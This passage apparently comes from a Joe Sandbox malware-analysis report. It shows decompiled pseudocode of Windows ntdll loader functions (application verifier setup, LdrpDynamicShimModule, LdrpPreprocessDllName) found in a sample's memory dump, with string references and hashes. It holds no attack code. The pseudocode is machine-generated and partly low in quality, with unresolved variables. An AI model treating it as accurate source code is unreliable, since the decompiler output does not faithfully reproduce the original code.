				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t69;
				signed int _t76;
				signed int _t88;
				intOrPtr _t92;
				signed int _t97;
				signed int _t103;
				signed int _t121;
				intOrPtr* _t124;
				intOrPtr _t126;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t130;

				_t115 = __edx;
				_t103 = __ecx;
				_t97 = 0;
				_v8 = __edx;
				_v31 = __ecx;
				_t126 =  *[fs:0x30];
				_v12 = _t126;
				_v24 = 0;
				_v28 = 0;
				_t50 = _a8;
				if(_t50 == 0) {
					_t121 = _a16;
					__eflags = _t121;
					if(_t121 != 0) {
						 *_t121 = 0;
						__eflags =  *(_t126 + 0x68) & 0x02000100;
						if(( *(_t126 + 0x68) & 0x02000100) == 0) {
							_t51 = E36B636EC();
							_t103 = _v31;
							__eflags = _t51;
							if(_t51 != 0) {
								_v28 = 2;
							}
						} else {
							_v28 = 1;
						}
						__eflags =  *(_t126 + 0x68) & 0x00000100;
						if(( *(_t126 + 0x68) & 0x00000100) != 0) {
							L35:
							_t52 = 0x48004;
							goto L36;
						} else {
							__eflags = _t103;
							if(_t103 != 0) {
								goto L35;
							}
							_t52 = 0;
							L36:
							_t127 = _a4;
							 *0x36bd5a74 = _t52;
							 *0x36bd5000 = 0;
							__eflags = _t127;
							if(_t127 == 0) {
								L40:
								__eflags = _v31;
								if(_v31 != 0) {
									 *0x36bd5238 = 1;
								}
								L42:
								__eflags = _t127;
								if(__eflags != 0) {
									__eflags = _t52 & 0x00000004;
									if((_t52 & 0x00000004) != 0) {
										E36AD6CC0(_t127, L"HandleTraces", "true", 0x36bd69d8, "true", 0);
									}
									E36AD6CC0(_t127, L"VerifierDebug", "true", 0x36bd69dc, "true", 0);
									E36AD6CC0(_t127, L"VerifierDlls", 1, 0x36bd5000, 0x200, 0);
								}
								_t116 = _v8;
								_t128 = L36B698B2(0x36ab1b98, _v8, __eflags, _t127, _a12, 0x36bd5260);
								__eflags = _t128;
								if(_t128 >= 0) {
									 *_t121 = 0x36bd5260;
									_t128 = E36B68FBB();
									__eflags = _t128;
									if(_t128 >= 0) {
										E36B11D66(0x36ab1b98, _t116, 0);
										 *0x36bd9234 = _v32;
										E36B11D66(0x36ab1b98, _t116, 1);
									}
								}
								L49:
								return _t128;
							}
							E36AD6CC0(_t127, L"VerifierFlags", "true",  &_v24, "true", 0);
							_t52 = _v48;
							__eflags = _t52;
							if(_t52 == 0) {
								_t52 =  *0x36bd5a74; // 0x0
								goto L40;
							}
							 *0x36bd5a74 = _t52;
							goto L42;
						}
					}
					_t128 = 0xc000000d;
					goto L49;
				}
				if(_t50 != 1) {
					L25:
					_t128 = _t97;
					goto L49;
				}
				 *0x36bd5244 = 0x36bd5240;
				 *0x36bd5240 = 0x36bd5240;
				_t128 = E36B0FBC0(0x36bd5220, 0, 0);
				if(_t128 < 0) {
					goto L49;
				}
				if( *0x36bd9234 == 2) {
					_v29 = 0;
					_t128 = E36B01934(0x36bd5308, 0,  &_v29);
					__eflags = _t128;
					if(_t128 < 0) {
						goto L49;
					}
					goto L25;
				}
				_push( *0x36bd5a74);
				_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
				_t69 =  *0x36bd5d8c; // 0x68b2ce0
				_t8 = _t69 + 0x30; // 0x68b1d08
				E36B6EF10(0x5d, 0, "AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled\n",  *_t8);
				if(E36B69429(_t115) >= 0) {
					_t130 =  *0x36bd5240; // 0x0
					while(1) {
						__eflags = _t130 - 0x36bd5240;
						if(__eflags == 0) {
							break;
						}
						_t71 = E36B6919C(_t97, _t130, 0x36bd5240, _t130, __eflags);
						__eflags = _t71;
						if(_t71 == 0) {
							_t128 = 0xc0000142;
							goto L49;
						} else {
							_t130 =  *_t130;
							continue;
						}
					}
					E36B68B5E(_t71);
					_t108 = 0x36ab1b88;
					_t128 = E36AFF380(0x36ab1b88, 0, _t97,  &_v20, _t97);
					__eflags = _t128;
					if(_t128 < 0) {
						__eflags = _t128 - 0xc0000135;
						if(_t128 != 0xc0000135) {
							goto L49;
						}
						_t131 =  *0x36bd5278; // 0x0
						L15:
						_t76 = E36AFCF00(_t108, 0, _t131, 0x36ab1b90, 0,  &_v16, 1, _v0);
						E36B11D66(_t108, 0, 0);
						__eflags = _t76;
						if(_t76 >= 0) {
							_t88 =  *0x7ffe0330;
							_t108 = _t88 & 0x0000001f;
							__eflags = _t88 & 0x0000001f;
							asm("ror eax, cl");
							 *0x36bd9238 = _t88 ^ _v16;
							 *0x36bd9230 = 1;
						}
						 *0x36bd9231 = 1;
						 *0x36bd9232 = 1;
						E36B6964A(E36B11D66(_t108, 0, 1));
						_t124 =  *0x36bd5240; // 0x0
						_t97 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t124 - 0x36bd5240;
							if(_t124 == 0x36bd5240) {
								break;
							}
							_v30 = _t97;
							_t128 = E36B01934( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x10)) + 0x50)), 0,  &_v30);
							__eflags = _t128;
							if(_t128 < 0) {
								goto L49;
							}
							_t124 =  *_t124;
						}
						__eflags =  *0x36bd69dc & 0x00000008;
						if(( *0x36bd69dc & 0x00000008) != 0) {
							_push("AVRF: -*- final list of providers -*- \n");
							E36B68EB8(E36ADB910());
						}
						E36B69818();
						E36AEE580(3,  *((intOrPtr*)(_v12 + 8)), _t97, _t97,  &_v28);
						goto L25;
					}
					_t108 = _v20;
					_t131 =  *((intOrPtr*)(_v20 + 0x18));
					E36AFD3E1(_t97, _v20,  *((intOrPtr*)(_v20 + 0x18)));
					goto L15;
				} else {
					_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
					_t92 =  *0x36bd5d8c; // 0x68b2ce0
					_t10 = _t92 + 0x30; // 0x68b1d08
					E36B6EF10(0x5d, 0, "AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.\n",  *_t10);
					_t128 = 0xc0000001;
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) & 0xfffffeff;
					goto L49;
				}
			}

0x36b68633
0x36b68633
0x36b68642
0x36b68644
0x36b68648
0x36b6864d
0x36b68654
0x36b68658
0x36b6865c
0x36b68661
0x36b68663
0x36b68861
0x36b68864
0x36b68866
0x36b68872
0x36b68877
0x36b6887e
0x36b68886
0x36b6888b
0x36b6888f
0x36b68891
0x36b68893
0x36b68893
0x36b68880
0x36b68880
0x36b68880
0x36b6889b
0x36b688a2
0x36b688ac
0x36b688ac
0x00000000
0x36b688a4
0x36b688a4
0x36b688a6
0x00000000
0x00000000
0x36b688a8
0x36b688b1
0x36b688b1
0x36b688b6
0x36b688bb
0x36b688c2
0x36b688c4
0x36b688ef
0x36b688ef
0x36b688f4
0x36b688f6
0x36b688f6
0x36b688fc
0x36b688fc
0x36b688fe
0x36b68900
0x36b68902
0x36b68915
0x36b68915
0x36b6892b
0x36b68943
0x36b68943
0x36b68948
0x36b6895f
0x36b68961
0x36b68963
0x36b68965
0x36b68970
0x36b68972
0x36b68974
0x36b68978
0x36b68982
0x36b68987
0x36b68987
0x36b68974
0x36b6898c
0x36b68994
0x36b68994
0x36b688d6
0x36b688db
0x36b688df
0x36b688e1
0x36b688ea
0x00000000
0x36b688ea
0x36b688e3
0x00000000
0x36b688e3
0x36b688a2
0x36b68868
0x00000000
0x36b68868
0x36b6866c
0x36b6885a
0x36b6885a
0x00000000
0x36b6885a
0x36b6867e
0x36b68684
0x36b6868f
0x36b68693
0x00000000
0x00000000
0x36b686a0
0x36b6883f
0x36b68850
0x36b68852
0x36b68854
0x00000000
0x00000000
0x00000000
0x36b68854
0x36b686a6
0x36b686b2
0x36b686b5
0x36b686ba
0x36b686c5
0x36b686d4
0x36b68719
0x36b6872e
0x36b6872e
0x36b68730
0x00000000
0x00000000
0x36b68723
0x36b68728
0x36b6872a
0x36b6875e
0x00000000
0x36b6872c
0x36b6872c
0x00000000
0x36b6872c
0x36b6872a
0x36b68732
0x36b68740
0x36b6874a
0x36b6874c
0x36b6874e
0x36b68768
0x36b6876e
0x00000000
0x00000000
0x36b68774
0x36b6877a
0x36b6878e
0x36b68797
0x36b6879c
0x36b6879e
0x36b687a0
0x36b687ab
0x36b687ab
0x36b687ae
0x36b687b0
0x36b687b5
0x36b687b5
0x36b687bc
0x36b687c2
0x36b687cd
0x36b687d2
0x36b687d8
0x36b687d8
0x36b687da
0x36b687da
0x36b687e0
0x00000000
0x00000000
0x36b687ec
0x36b687f8
0x36b687fa
0x36b687fc
0x00000000
0x00000000
0x36b68802
0x36b68802
0x36b68806
0x36b6880d
0x36b6880f
0x36b6881a
0x36b6881a
0x36b6881f
0x36b68834
0x00000000
0x36b68834
0x36b68750
0x36b68754
0x36b68757
0x00000000
0x36b686d6
0x36b686dc
0x36b686df
0x36b686e4
0x36b686ef
0x36b686fd
0x36b68711
0x00000000
0x36b68711

Strings

VerifierFlags, xrefs: 36B688D0
AVRF: -*- final list of providers -*- , xrefs: 36B6880F
VerifierDebug, xrefs: 36B68925
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 36B686E7
HandleTraces, xrefs: 36B6890F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 36B686BD
VerifierDlls, xrefs: 36B6893D

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 94355d378da5d0c0cfd3b28dcc3645340577f8f8ba5f5a382dd1d267af73a49b
Instruction ID: 2c11dcc00639191efa15ffc1dbb5ba9d28482df6b47106591bf2b7b147ecf566
Opcode Fuzzy Hash: 94355d378da5d0c0cfd3b28dcc3645340577f8f8ba5f5a382dd1d267af73a49b
Instruction Fuzzy Hash: B1910172A04722AFE711DF668C90B1ABBA9EB4475CF450958FA406F291C734DC05CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 36B0237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E36B0237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x36bd38b8;
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x36bd68d8; // 0x0
						if(_t22 != 0) {
							E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x36bd68d8 = _t50;
							 *0x36bd5d4c = _t50;
						}
					}
					 *0x36bd38b8 = _t38;
					return _t55;
				}
				_t59 =  *0x36bd68d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x36bd38b8 = 0;
					_t55 = E36B61BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x36bd68d8; // 0x0
						while( *_t51 != 0) {
							 *0x36bd91e0(_t51, 0, "true", "true", 0, "true", "true");
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x36bd9218; // 0x0
						_push("true");
						_v12 = _t30;
						_pop(_t45);
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E36AEFED0(0x36bd32d8);
						if( *0x36bd65f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E36AD6704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x36bd32d8);
						E36AEE740(_t46);
						goto L21;
					}
					_t36 =  *0x36bd37c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E36B5E692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x36bd37c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}

0x36b02383
0x36b0238b
0x36b0238d
0x36b02390
0x36b02393
0x36b02397
0x36b023a5
0x36b023a8
0x36b023aa
0x36b023b1
0x36b4a878
0x36b4a87d
0x36b4a883
0x36b4a883
0x36b023b1
0x36b023ba
0x36b023c3
0x36b023c3
0x36b02399
0x36b0239f
0x36b4a784
0x36b4a78f
0x36b4a793
0x36b4a7cd
0x36b4a80b
0x36b4a7e3
0x36b4a7e9
0x36b4a7ee
0x36b4a866
0x36b4a85f
0x36b4a85f
0x00000000
0x36b4a85f
0x36b4a7f0
0x36b4a7f2
0x36b4a7f2
0x36b4a7f5
0x36b4a7f5
0x36b4a7f8
0x36b4a7fb
0x36b4a808
0x36b4a808
0x36b4a812
0x36b4a817
0x36b4a81d
0x36b4a81f
0x36b4a825
0x36b4a826
0x36b4a82d
0x36b4a82f
0x36b4a83b
0x36b4a83d
0x36b4a849
0x36b4a850
0x36b4a850
0x36b4a849
0x36b4a855
0x36b4a85a
0x00000000
0x36b4a85a
0x36b4a795
0x36b4a79c
0x36b4a7b4
0x36b4a7b9
0x36b4a7be
0x36b4a7c3
0x36b4a7c5
0x36b4a7c5
0x36b4a7c6
0x36b4a7c6
0x00000000

Strings

apphelp.dll, xrefs: 36B02382
LdrpDynamicShimModule, xrefs: 36B4A7A5
minkernel\ntdll\ldrinit.c, xrefs: 36B4A7AF
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 36B4A79F

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 9b061c3066e65554ac11fd9a55debfb5638b2bef0e40051e565791883713a41f
Instruction ID: ead2f91d8c868822e677be7235e15d125a1246fdea11346df405e9836257680d
Opcode Fuzzy Hash: 9b061c3066e65554ac11fd9a55debfb5638b2bef0e40051e565791883713a41f
Instruction Fuzzy Hash: 2E316B76E00250EFF721AF19CC91E597BB6FB85744F240059EA00BB255EBB99C42DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 36AFB0D0 Relevance: 7.8, Strings: 6, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E36AFB0D0(signed short* __ecx, signed short* __edx, signed int _a4, signed int* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed short* _v12;
				char _v16;
				signed int _v20;
				char _v28;
				char _v36;
				char _v44;
				signed int _t75;
				char* _t76;
				signed int _t79;
				signed short* _t81;
				signed short* _t89;
				short* _t93;
				signed short* _t96;
				signed int _t97;
				signed int _t103;
				signed int _t112;
				void* _t119;
				char _t128;
				signed int _t134;
				signed short* _t135;
				signed int _t136;
				signed int* _t138;
				signed int _t140;
				signed short _t141;
				void* _t144;
				signed short _t145;
				signed int _t146;
				signed int _t151;
				signed short* _t161;
				signed short _t165;
				signed short _t168;
				signed short* _t183;
				signed int _t184;
				signed int _t186;
				void* _t189;

				_t135 = __ecx;
				_t183 = __edx;
				_v12 = __ecx;
				if(E36AFC4A0(0,  &_v16) < 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_t138 = _a8;
				_t75 = 0;
				_t184 = 0;
				_v5 = 0;
				if(( *_t138 & 0x00800008) != 0) {
					L16:
					_v12 = _t135;
					if( *_t183 != 0) {
						__eflags =  *0x36bd37c0 & 0x00000005;
						if(( *0x36bd37c0 & 0x00000005) != 0) {
							__eflags = _t75;
							_t76 = "SxS";
							if(_t75 == 0) {
								_t76 = "API set";
							}
							_push(_t76);
							_push(_t183);
							E36B5E692("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t135);
							_t138 = _a8;
							_t189 = _t189 + 0x20;
						}
						_t79 =  *_t138 | 0x00000200;
						__eflags = _v5;
						 *_t138 = _t79;
						if(_v5 != 0) {
							 *_t138 = _t79 | 0x00000004;
						}
						_t81 = _t183;
						_v12 = _t81;
						L27:
						if(_t184 < 0) {
							goto L83;
						}
						if(( *_t138 & 0x00000200) != 0) {
							E36AEFCF0(_t138, _t183);
							_t81 = _v12;
						}
						_t165 = _t81[2];
						_t89 = ( *_t81 & 0x0000ffff) + 0xfffffffe + _t165;
						if(_t89 < _t165) {
							L34:
							_t184 = E36AFC7E7(_t183, 0x36ab116c);
							goto L39;
						} else {
							while(1) {
								_t140 =  *_t89 & 0x0000ffff;
								if(_t140 == 0x2e) {
									break;
								}
								if(_t140 != 0x2f && _t140 != 0x5c) {
									_t89 = _t89 - 2;
									if(_t89 >= _t165) {
										continue;
									}
								}
								goto L34;
							}
							_t141 = _t183[2];
							_t93 = ( *_t183 & 0x0000ffff) + 0xfffffffe + _t141;
							__eflags = _t93 - _t141;
							if(_t93 < _t141) {
								L38:
								__eflags = 0;
								 *((short*)(_t93 + 2)) = 0;
								L39:
								if(_t184 < 0) {
									goto L83;
								}
								goto L40;
							}
							while(1) {
								__eflags =  *_t93 - 0x2e;
								if( *_t93 != 0x2e) {
									goto L38;
								}
								_t93 = _t93 - 2;
								 *_t183 =  *_t183 + 0xfffe;
								__eflags = _t93 - _t141;
								if(_t93 >= _t141) {
									continue;
								}
								goto L38;
							}
							goto L38;
						}
					}
					_t168 = _t135[2];
					_t96 = ( *_t135 & 0x0000ffff) + 0xfffffffe + _t168;
					if(_t96 < _t168) {
						L22:
						 *_t138 =  *_t138 | 0x00000020;
						_t184 = 0;
						_t97 =  *_t135 & 0x0000ffff;
						if(_t97 == 0) {
							L26:
							_t81 = _t135;
							goto L27;
						}
						_t144 = _t97 + ( *_t183 & 0x0000ffff) + 2;
						if(_t144 > (_t183[1] & 0x0000ffff)) {
							__eflags = _t144 - 0xfffe;
							if(_t144 <= 0xfffe) {
								_t62 = _t144 + 0x3f; // -191
								_t186 = _t62 & 0xffffffc0;
								__eflags = _t186 - 0xfffe;
								if(_t186 > 0xfffe) {
									_t186 = 0xfffe;
								}
								_t145 = _t183[2];
								_t64 =  &(_t183[4]); // 0x1000008
								__eflags = _t145 - _t64;
								if(_t145 == _t64) {
									_t146 = E36AF5D60(_t186);
									_v20 = _t146;
									__eflags = _t146;
									if(_t146 == 0) {
										goto L80;
									}
									_t103 =  *_t183 & 0x0000ffff;
									__eflags = _t103;
									if(_t103 != 0) {
										E36B288C0(_t146, _t183[2], _t103);
										_t146 = _v20;
										_t189 = _t189 + 0xc;
									}
									goto L78;
								} else {
									_t146 = E36B63C57(_t186, _t145);
									L78:
									__eflags = _t146;
									if(_t146 == 0) {
										L80:
										_t184 = 0xc0000017;
										L25:
										_t138 = _a8;
										goto L26;
									}
									_t183[2] = _t146;
									_t183[1] = _t186;
									goto L24;
								}
							}
							_t184 = 0xc0000106;
							goto L25;
						}
						L24:
						_t184 = 0;
						E36B288C0(( *_t183 & 0x0000ffff) + _t183[2], _t135[2],  *_t135 & 0x0000ffff);
						_t189 = _t189 + 0xc;
						 *_t183 =  *_t183 + ( *_t135 & 0x0000ffff);
						 *((short*)(_t183[2] + (( *_t183 & 0x0000ffff) >> 1) * 2)) = 0;
						goto L25;
					} else {
						goto L18;
					}
					while(1) {
						L18:
						_t151 =  *_t96 & 0x0000ffff;
						if(_t151 == 0x5c || _t151 == 0x2f) {
							break;
						}
						_t96 = _t96 - 2;
						if(_t96 >= _t168) {
							continue;
						}
						_t138 = _a8;
						goto L22;
					}
					__eflags = E36B1432E(_t135) - 5;
					if(__eflags == 0) {
						_t184 = E36AFC7E7(_t183, _t135);
						goto L25;
					}
					_t112 = E36B023C4(_t135, _t183, __eflags);
					_t138 = _a8;
					_t184 = _t112;
					_t81 = _t135;
					__eflags = _t184;
					if(_t184 < 0) {
						goto L83;
					}
					 *_t138 =  *_t138 | 0x00000600;
					goto L27;
				} else {
					_v5 = 0;
					_v20 =  *[fs:0x30];
					_v7 = 1;
					E36AFDF36(0, _t135, 0x14d0);
					asm("sbb edx, edx");
					if(E36B0015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _t135,  ~_a4 & _a4 + 0x0000002c,  &_v6,  &_v28) < 0 || _v6 == 0) {
						_t119 = 0x14d3;
					} else {
						__eflags = _v28;
						if(_v28 == 0) {
							_t119 = 0x14d2;
						} else {
							_t119 = 0x14d1;
						}
					}
					E36AFDF36(0, _t135, _t119);
					if(_v6 != 0) {
						__eflags = _v28;
						if(_v28 == 0) {
							_t184 = 0xc0000481;
							goto L14;
						}
						 *_t183 = 0;
						E36B25050(0,  &_v44, E36AF01C0());
						E36AFC7E7(_t183,  &_v44);
						E36AFC7E7(_t183, 0x36ab1008);
						_t184 = E36AFC7E7(_t183,  &_v28);
						__eflags = _t184;
						if(_t184 < 0) {
							goto L7;
						}
						_t134 =  *(_v20 + 0x10);
						__eflags = _t134;
						if(_t134 == 0) {
							L53:
							_t128 = 0;
							__eflags = 0;
							L54:
							_t161 = _t183;
							goto L8;
						}
						__eflags =  *(_t134 + 8) & 0x00001000;
						if(( *(_t134 + 8) & 0x00001000) != 0) {
							_t128 = 1;
							goto L54;
						}
						goto L53;
					} else {
						L7:
						_t128 = _v7;
						_t161 = _t135;
						L8:
						if(_t184 < 0) {
							L83:
							__eflags =  *0x36bd37c0 & 0x00000003;
							if(( *0x36bd37c0 & 0x00000003) != 0) {
								_push(_t184);
								E36B5E692("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _t135);
							}
							__eflags =  *0x36bd37c0 & 0x00000010;
							if(( *0x36bd37c0 & 0x00000010) != 0) {
								asm("int3");
							}
							L40:
							if(_v8 != 0) {
								E36AFC4A0(_v16,  &_v16);
							}
							return _t184;
						} else {
							if(_t128 != 0 &&  *0x36bd5d70 == 0) {
								_t136 = E36AF9870("true", _t161, 0x36ab116c, 0,  &_v36, 0, 0, 0, 0);
								if(_t136 >= 0) {
									_v5 = 1;
									E36B023C4( &_v36, _t183, __eflags);
									E36B0E3C9( &_v36);
								}
								if(_t136 != 0xc0150008) {
									_t184 = _t136;
								}
								_t135 = _v12;
							}
							L14:
							if(_t184 < 0) {
								goto L83;
							} else {
								_t138 = _a8;
								_t75 = _v5;
								goto L16;
							}
						}
					}
				}
			}

0x36afb0de
0x36afb0e3
0x36afb0e5
0x36afb0ef
0x36b481db
0x36afb0f5
0x36afb0f5
0x36afb0f5
0x36afb0f9
0x36afb0fc
0x36afb0fe
0x36afb100
0x36afb109
0x36afb1d5
0x36afb1d9
0x36afb1dc
0x36afb303
0x36afb30a
0x36b481f8
0x36b481fa
0x36b481ff
0x36b48201
0x36b48201
0x36b48206
0x36b48207
0x36b4821f
0x36b48224
0x36b48227
0x36b48227
0x36afb312
0x36afb317
0x36afb31b
0x36afb31d
0x36afb3ff
0x36afb3ff
0x36afb323
0x36afb325
0x36afb264
0x36afb266
0x00000000
0x00000000
0x36afb272
0x36afb2f6
0x36afb2fb
0x36afb2fb
0x36afb278
0x36afb281
0x36afb285
0x36afb2a0
0x36afb2ac
0x00000000
0x36afb287
0x36afb287
0x36afb287
0x36afb28d
0x00000000
0x00000000
0x36afb292
0x36afb299
0x36afb29e
0x00000000
0x00000000
0x36afb29e
0x00000000
0x36afb292
0x36afb2b3
0x36afb2b9
0x36afb2bb
0x36afb2bd
0x36afb2ca
0x36afb2ca
0x36afb2cc
0x36afb2d0
0x36afb2d2
0x00000000
0x00000000
0x00000000
0x36afb2d2
0x36afb2c0
0x36afb2c0
0x36afb2c4
0x00000000
0x00000000
0x36b482bf
0x36b482c2
0x36b482c5
0x36b482c7
0x00000000
0x00000000
0x00000000
0x36b482cd
0x00000000
0x36afb2c0
0x36afb285
0x36afb1e5
0x36afb1eb
0x36afb1ef
0x36afb210
0x36afb210
0x36afb213
0x36afb215
0x36afb21b
0x36afb262
0x36afb262
0x00000000
0x36afb262
0x36afb225
0x36afb22d
0x36b4823f
0x36b48245
0x36b48251
0x36b48254
0x36b48257
0x36b4825d
0x36b4825f
0x36b4825f
0x36b48264
0x36b48267
0x36b4826a
0x36b4826c
0x36b4827f
0x36b48281
0x36b48284
0x36b48286
0x00000000
0x00000000
0x36b48288
0x36b4828b
0x36b4828e
0x36b48295
0x36b4829a
0x36b4829d
0x36b4829d
0x00000000
0x36b4826e
0x36b48275
0x36b482a0
0x36b482a0
0x36b482a2
0x36b482b0
0x36b482b0
0x36afb25f
0x36afb25f
0x00000000
0x36afb25f
0x36b482a4
0x36b482a7
0x00000000
0x36b482a7
0x36b4826c
0x36b48247
0x00000000
0x36b48247
0x36afb233
0x36afb236
0x36afb243
0x36afb24b
0x36afb24e
0x36afb25b
0x00000000
0x00000000
0x00000000
0x00000000
0x36afb1f1
0x36afb1f1
0x36afb1f1
0x36afb1f7
0x00000000
0x00000000
0x36afb206
0x36afb20b
0x00000000
0x00000000
0x36afb20d
0x00000000
0x36afb20d
0x36afb3ae
0x36afb3b1
0x36b48238
0x00000000
0x36b48238
0x36afb3bb
0x36afb3c0
0x36afb3c3
0x36afb3c5
0x36afb3c7
0x36afb3c9
0x00000000
0x00000000
0x36afb3cf
0x00000000
0x36afb10f
0x36afb117
0x36afb123
0x36afb129
0x36afb12d
0x36afb144
0x36afb154
0x36afb160
0x36afb32d
0x36afb32d
0x36afb332
0x36b481e4
0x36afb338
0x36afb338
0x36afb338
0x36afb332
0x36afb16a
0x36afb173
0x36afb342
0x36afb347
0x36b481ee
0x00000000
0x36b481ee
0x36afb34f
0x36afb35c
0x36afb366
0x36afb372
0x36afb381
0x36afb383
0x36afb385
0x00000000
0x00000000
0x36afb38e
0x36afb391
0x36afb393
0x36afb39e
0x36afb39e
0x36afb39e
0x36afb3a0
0x36afb3a0
0x00000000
0x36afb3a0
0x36afb395
0x36afb39c
0x36afb406
0x00000000
0x36afb406
0x00000000
0x36afb179
0x36afb179
0x36afb179
0x36afb17c
0x36afb17e
0x36afb180
0x36b482d2
0x36b482d2
0x36b482d9
0x36b482db
0x36b482f3
0x36b482f8
0x36b482fb
0x36b48302
0x36b48308
0x36b48308
0x36afb2d8
0x36afb2dc
0x36afb2e5
0x36afb2e5
0x36afb2f2
0x36afb186
0x36afb188
0x36afb1ae
0x36afb1b2
0x36afb3dc
0x36afb3e3
0x36afb3eb
0x36afb3eb
0x36afb1be
0x36afb3f5
0x36afb3f5
0x36afb1c4
0x36afb1c4
0x36afb1c7
0x36afb1c9
0x00000000
0x36afb1cf
0x36afb1cf
0x36afb1d2
0x00000000
0x36afb1d2
0x36afb1c9
0x36afb180
0x36afb173

Strings

LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 36B482DD
DLL %wZ was redirected to %wZ by %s, xrefs: 36B48209
API set, xrefs: 36B48201, 36B48206
LdrpPreprocessDllName, xrefs: 36B48210, 36B482E4
SxS, xrefs: 36B481FA
minkernel\ntdll\ldrutil.c, xrefs: 36B4821A, 36B482EE

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: de8f251377695bbcf959ec3d7009a6fe9c1845d354f5244401b718f3a72a02d7
Instruction ID: 36a71c50f8dbcfadc60632ad1765c61f2a0703d955448907d7ec5b1b683dc10b
Opcode Fuzzy Hash: de8f251377695bbcf959ec3d7009a6fe9c1845d354f5244401b718f3a72a02d7
Instruction Fuzzy Hash: 21C10275E10325ABEB058B65CC90BBEBBF5AF45344F6441A9FC019F290DB76C844C7A2

Uniqueness

Uniqueness Score: -1.00%

